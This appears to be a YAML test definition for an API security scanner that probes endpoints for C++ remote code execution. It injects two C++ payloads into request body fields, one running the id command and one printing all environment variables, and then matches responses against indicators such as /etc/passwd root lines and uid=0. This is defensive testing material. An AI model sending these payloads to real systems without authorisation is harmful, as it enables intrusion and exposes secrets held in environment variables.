---
id: FRAMEWORK_RCE_CPP
info:
  name: "Framework RCE - C++"
  description: "Tests whether C++ code execution environments are vulnerable to Remote Code Execution through code injection."
  details: "This test injects C++ code execution payloads into body parameters to check if the application compiles and executes them, indicating a Remote Code Execution vulnerability."
  impact: "Remote Code Execution vulnerabilities allow attackers to execute arbitrary code on the server, potentially leading to complete system compromise, unauthorized access to sensitive data, and lateral movement within the network."
  category:
    name: COMMAND_INJECTION
    shortName: Command Injection
    displayName: Command Injection
  subCategory: FRAMEWORK_RCE_CPP
  severity: CRITICAL
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
  references:
    - "https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Command_Injection"
  cwe:
    - CWE-78
    - CWE-77
    - CWE-94

attributes:
  nature: INTRUSIVE
  plan: PRO
  duration: FAST

api_selection_filters:
  method:
    neq: "OPTIONS"
  response_code:
    gte: 200
    lt: 300
  response_payload:
    length:
      gt: 0
  or:
    - request_payload:
        for_one:
          key:
            regex: .*
            extractMultiple: bodyKeys

wordLists:
  # C++ RCE payloads
  cppPayloads:
    - "#include <cstdlib>\nint main(){char c[]={'i','d',0};system(c);}"
    - "#include <iostream> \nextern char **environ; int main(){for(char **e = environ; *e; e++) std::cout << *e << std::endl; return 0;}"
  
  # Command execution outcomes
  rceOutcomes:
    - "root:*:0:0:"
    - "root:.*:0:0:"
    - "uid=0"
    - "gid=0"
    - "Linux"
    - "Unix"
    - "GNU/Linux"
    - "bin/bash"
    - "bin/sh"
    - "/etc/passwd"
    - "daemon:"
    - "nobody:"
    - "www-data:"
    - "#include"
    - "system(c)"

execute:
  type: single
  requests:
    - req:
        - modify_method: POST
        - for_each_combination: true
        - modify_body_param:
            ${bodyKeys}: "${cppPayloads}"
        - modify_header:
            Content-Type: "application/json"

validate:
  response_code:
    gte: 200
    lt: 500
  response_payload:
    or:
      - contains_either: "${rceOutcomes}"
      - contains_either:
          - "uid="
          - "gid="
          - "Linux"
          - "Unix"
